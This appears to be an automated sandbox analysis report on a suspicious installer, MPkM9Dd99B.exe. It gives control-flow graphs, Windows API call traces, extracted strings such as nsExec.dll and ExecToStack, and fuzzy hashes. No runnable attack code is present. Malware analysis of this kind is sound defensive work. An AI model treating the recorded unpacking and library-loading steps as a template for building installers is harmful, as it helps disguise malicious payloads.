                                control_flow_graph 308 403a96-403aae call 4066b5 311 403ab0-403ac0 call 4061eb 308->311 312 403ac2-403af3 call 406174 308->312 321 403b16-403b3f call 403d5b call 405d0d 311->321 317 403af5-403b06 call 406174 312->317 318 403b0b-403b11 lstrcatA 312->318 317->318 318->321 326 403b45-403b4a 321->326 327 403bc6-403bce call 405d0d 321->327 326->327 328 403b4c-403b64 call 406174 326->328 333 403bd0-403bd7 call 406320 327->333 334 403bdc-403c01 LoadImageA 327->334 332 403b69-403b70 328->332 332->327 335 403b72-403b74 332->335 333->334 337 403c82-403c8a call 40140b 334->337 338 403c03-403c33 RegisterClassA 334->338 339 403b85-403b91 lstrlenA 335->339 340 403b76-403b83 call 405c4a 335->340 352 403c94-403c9f call 403d5b 337->352 353 403c8c-403c8f 337->353 341 403d51 338->341 342 403c39-403c7d SystemParametersInfoA CreateWindowExA 338->342 346 403b93-403ba1 lstrcmpiA 339->346 347 403bb9-403bc1 call 405c1f call 40628d 339->347 340->339 345 403d53-403d5a 341->345 342->337 346->347 351 403ba3-403bad GetFileAttributesA 346->351 347->327 356 403bb3-403bb4 call 405c66 351->356 357 403baf-403bb1 351->357 361 403ca5-403cbf ShowWindow call 406647 352->361 362 403d28-403d29 call 4054a3 352->362 353->345 356->347 357->347 357->356 369 403cc1-403cc6 call 406647 361->369 370 403ccb-403cdd GetClassInfoA 361->370 365 403d2e-403d30 362->365 367 403d32-403d38 365->367 368 403d4a-403d4c call 40140b 365->368 367->353 371 403d3e-403d45 call 40140b 367->371 368->341 369->370 374 403cf5-403d18 DialogBoxParamA call 40140b 370->374 375 403cdf-403cef GetClassInfoA RegisterClassA 370->375 371->353 379 403d1d-403d26 call 4039e6 374->379 375->374 379->345
                                APIs
                                  • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                  • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,75573410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\MPkM9Dd99B.exe",0000000A,0000000C), ref: 00403B11
                                • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,75573410), ref: 00403B86
                                • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                • GetFileAttributesA.KERNEL32(Remove folder: ,?,"C:\Users\user\Desktop\MPkM9Dd99B.exe",0000000A,0000000C), ref: 00403BA4
                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth), ref: 00403BED
                                  • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\MPkM9Dd99B.exe",0000000A,0000000C), ref: 00403CAD
                                • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: "C:\Users\user\Desktop\MPkM9Dd99B.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                • API String ID: 1975747703-3894366081
                                • Opcode ID: 79260377285cc82dbbfc7a510320d5572e35410a0c0bc4c8fa40152996274480
                                • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                • Opcode Fuzzy Hash: 79260377285cc82dbbfc7a510320d5572e35410a0c0bc4c8fa40152996274480
                                • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D
                                Function 00402F31 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 382 402f31-402f7f GetTickCount GetModuleFileNameA call 405e20 385 402f81-402f86 382->385 386 402f8b-402fb9 call 40628d call 405c66 call 40628d GetFileSize 382->386 387 403161-403165 385->387 394 4030a4-4030b2 call 402ecd 386->394 395 402fbf 386->395 401 4030b4-4030b7 394->401 402 403107-40310c 394->402 397 402fc4-402fdb 395->397 399 402fdd 397->399 400 402fdf-402fe8 call 40337a 397->400 399->400 407 40310e-403116 call 402ecd 400->407 408 402fee-402ff5 400->408 405 4030b9-4030d1 call 403390 call 40337a 401->405 406 4030db-403105 GlobalAlloc call 403390 call 403168 401->406 402->387 405->402 429 4030d3-4030d9 405->429 406->402 433 403118-403129 406->433 407->402 411 403071-403075 408->411 412 402ff7-40300b call 405ddb 408->412 419 403077-40307e call 402ecd 411->419 420 40307f-403085 411->420 412->420 431 40300d-403014 412->431 419->420 424 403094-40309c 420->424 425 403087-403091 call 40676c 420->425 424->397 432 4030a2 424->432 425->424 429->402 429->406 431->420 435 403016-40301d 431->435 432->394 436 403131-403136 433->436 437 40312b 433->437 435->420 438 40301f-403026 435->438 439 403137-40313d 436->439 437->436 438->420 440 403028-40302f 438->440 439->439 441 40313f-40315a SetFilePointer call 405ddb 439->441 440->420 443 403031-403051 440->443 444 40315f 441->444 443->402 445 403057-40305b 443->445 444->387 446 403063-40306b 445->446 447 40305d-403061 445->447 446->420 448 40306d-40306f 446->448 447->432 447->446 448->420
                                APIs
                                • GetTickCount.KERNEL32 ref: 00402F42
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MPkM9Dd99B.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                  • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                  • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MPkM9Dd99B.exe,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: "C:\Users\user\Desktop\MPkM9Dd99B.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MPkM9Dd99B.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                • API String ID: 2803837635-1816034078
                                • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D
                                Function 00406320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 208stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 449 406320-40632b 450 40632d-40633c 449->450 451 40633e-406353 449->451 450->451 452 406564-406568 451->452 453 406359-406364 451->453 455 406376-406380 452->455 456 40656e-406578 452->456 453->452 454 40636a-406371 453->454 454->452 455->456 459 406386-40638d 455->459 457 406583-406584 456->457 458 40657a-40657e call 40628d 456->458 458->457 461 406393-4063c9 459->461 462 406557 459->462 463 406501-406504 461->463 464 4063cf-4063d9 461->464 465 406561-406563 462->465 466 406559-40655f 462->466 469 406534-406537 463->469 470 406506-406509 463->470 467 4063f6 464->467 468 4063db-4063e4 464->468 465->452 466->452 476 4063fd-406405 467->476 468->467 475 4063e6-4063e9 468->475 473 406545-406555 lstrlenA 469->473 474 406539-406540 call 406320 469->474 471 406519-406525 call 40628d 470->471 472 40650b-406517 call 4061eb 470->472 486 40652a-406530 471->486 472->486 473->452 474->473 475->467 480 4063eb-4063ee 475->480 481 406407 476->481 482 40640e-406410 476->482 480->467 487 4063f0-4063f4 480->487 481->482 483 406412-40642d call 406174 482->483 484 406447-40644a 482->484 492 406432-406435 483->492 490 40644c-406458 GetSystemDirectoryA 484->490 491 40645d-406460 484->491 486->473 489 406532 486->489 487->476 493 4064f9-4064ff call 406587 489->493 494 4064e3-4064e6 490->494 495 406471-406474 491->495 496 406462-40646e GetWindowsDirectoryA 491->496 497 4064e8-4064ec 492->497 498 40643b-406442 call 406320 492->498 493->473 494->493 494->497 495->494 500 406476-406494 495->500 496->495 497->493 502 4064ee-4064f4 lstrcatA 497->502 498->494 504 406496-406499 500->504 505 4064ab-4064b7 call 4066b5 500->505 502->493 504->505 508 40649b-40649f 504->508 511 4064bf-4064c3 505->511 510 4064a7-4064a9 508->510 510->494 510->505 512 4064c5-4064d8 SHGetPathFromIDListA CoTaskMemFree 511->512 513 4064da-4064e1 511->513 512->494 512->513 513->494 513->500
                                APIs
                                • GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00406452
                                • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00000000), ref: 00406468
                                • SHGetPathFromIDListA.SHELL32(00000000,Remove folder: ,?,T@,00000007,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000), ref: 004064C7
                                • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000), ref: 004064D0
                                • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000), ref: 004064F4
                                • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00000000,00422E40,755723A0), ref: 00406546
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                • String ID: T@$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\$Software\Microsoft\Windows\CurrentVersion$Under i$$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4024019347-636480903
                                • Opcode ID: 528d0d34f11662d8c7703c4154d98a0add83743daff245b27c466bc1c92f2fac
                                • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                • Opcode Fuzzy Hash: 528d0d34f11662d8c7703c4154d98a0add83743daff245b27c466bc1c92f2fac
                                • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D
                                Function 0040177E Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 583 40177e-4017a1 call 402c5e call 405c8c 588 4017a3-4017a9 call 40628d 583->588 589 4017ab-4017bd call 40628d call 405c1f lstrcatA 583->589 595 4017c2-4017c8 call 406587 588->595 589->595 599 4017cd-4017d1 595->599 600 4017d3-4017dd call 406620 599->600 601 401804-401807 599->601 609 4017ef-401801 600->609 610 4017df-4017ed CompareFileTime 600->610 603 401809-40180a call 405dfb 601->603 604 40180f-40182b call 405e20 601->604 603->604 611 4018a3-4018cc call 4053d1 call 403168 604->611 612 40182d-401830 604->612 609->601 610->609 626 4018d4-4018e0 SetFileTime 611->626 627 4018ce-4018d2 611->627 613 401832-401874 call 40628d * 2 call 406320 call 40628d call 4059a3 612->613 614 401885-40188f call 4053d1 612->614 613->599 647 40187a-40187b 613->647 624 401898-40189e 614->624 628 402af3 624->628 630 4018e6-4018f1 CloseHandle 626->630 627->626 627->630 631 402af5-402af9 628->631 633 4018f7-4018fa 630->633 634 402aea-402aed 630->634 636 4018fc-40190d call 406320 lstrcatA 633->636 637 40190f-401912 call 406320 633->637 634->628 642 401917-4023b9 call 4059a3 636->642 637->642 642->631 642->634 647->624 649 40187d-40187e 647->649 649->614
                                APIs
                                • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede,00000000,00000000,00000031), ref: 004017BD
                                • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede,00000000,00000000,00000031), ref: 004017E7
                                  • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Ifrende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                  • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0), ref: 0040542D
                                  • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 0040543F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede$C:\Users\user\AppData\Local\Temp\nsz930C.tmp$C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll$ExecToStack$Under i$
                                • API String ID: 1941528284-4268067446
                                • Opcode ID: 699483246fe71b07c72269ff801a32e29f6d0f6d2c6e80c57e7fc8c9a70540fa
                                • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                • Opcode Fuzzy Hash: 699483246fe71b07c72269ff801a32e29f6d0f6d2c6e80c57e7fc8c9a70540fa
                                • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD
                                Function 004053D1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 650 4053d1-4053e6 651 40549c-4054a0 650->651 652 4053ec-4053fe 650->652 653 405400-405404 call 406320 652->653 654 405409-405415 lstrlenA 652->654 653->654 656 405432-405436 654->656 657 405417-405427 lstrlenA 654->657 659 405445-405449 656->659 660 405438-40543f SetWindowTextA 656->660 657->651 658 405429-40542d lstrcatA 657->658 658->656 661 40544b-40548d SendMessageA * 3 659->661 662 40548f-405491 659->662 660->659 661->662 662->651 663 405493-405496 662->663 663->651
                                APIs
                                • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                • lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0), ref: 0040542D
                                • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 0040543F
                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\
                                • API String ID: 2531174081-1795491705
                                • Opcode ID: ebdbd1b6f4dce09f55bb89e7b78eef38760fa4045934dab0d298cb41f38885f9
                                • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                • Opcode Fuzzy Hash: ebdbd1b6f4dce09f55bb89e7b78eef38760fa4045934dab0d298cb41f38885f9
                                • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8
                                Function 00403168 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 664 403168-40317c 665 403185-40318e 664->665 666 40317e 664->666 667 403190 665->667 668 403197-40319c 665->668 666->665 667->668 669 4031ac-4031b9 call 40337a 668->669 670 40319e-4031a7 call 403390 668->670 674 403368 669->674 675 4031bf-4031c3 669->675 670->669 676 40336a-40336b 674->676 677 403313-403315 675->677 678 4031c9-403212 GetTickCount 675->678 681 403373-403377 676->681 679 403355-403358 677->679 680 403317-40331a 677->680 682 403370 678->682 683 403218-403220 678->683 686 40335a 679->686 687 40335d-403366 call 40337a 679->687 680->682 688 40331c 680->688 682->681 684 403222 683->684 685 403225-403233 call 40337a 683->685 684->685 685->674 697 403239-403242 685->697 686->687 687->674 698 40336d 687->698 691 40331f-403325 688->691 694 403327 691->694 695 403329-403337 call 40337a 691->695 694->695 695->674 701 403339-403345 call 405ec7 695->701 700 403248-403268 call 4067da 697->700 698->682 706 40330b-40330d 700->706 707 40326e-403281 GetTickCount 700->707 708 403347-403351 701->708 709 40330f-403311 701->709 706->676 710 403283-40328b 707->710 711 4032c6-4032c8 707->711 708->691 712 403353 708->712 709->676 713 403293-4032be MulDiv wsprintfA call 4053d1 710->713 714 40328d-403291 710->714 715 4032ca-4032ce 711->715 716 4032ff-403303 711->716 712->682 723 4032c3 713->723 714->711 714->713 717 4032d0-4032d7 call 405ec7 715->717 718 4032e5-4032f0 715->718 716->683 719 403309 716->719 724 4032dc-4032de 717->724 722 4032f3-4032f7 718->722 719->682 722->700 725 4032fd 722->725 723->711 724->709 726 4032e0-4032e3 724->726 725->682 726->722
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CountTick$wsprintf
                                • String ID: %A$... %d%%$@.B
                                • API String ID: 551687249-2309215229
                                • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9
                                Function 00406647 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 727 406647-406667 GetSystemDirectoryA 728 406669 727->728 729 40666b-40666d 727->729 728->729 730 40667d-40667f 729->730 731 40666f-406677 729->731 733 406680-4066b2 wsprintfA LoadLibraryExA 730->733 731->730 732 406679-40667b 731->732 732->733
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                • wsprintfA.USER32 ref: 00406697
                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
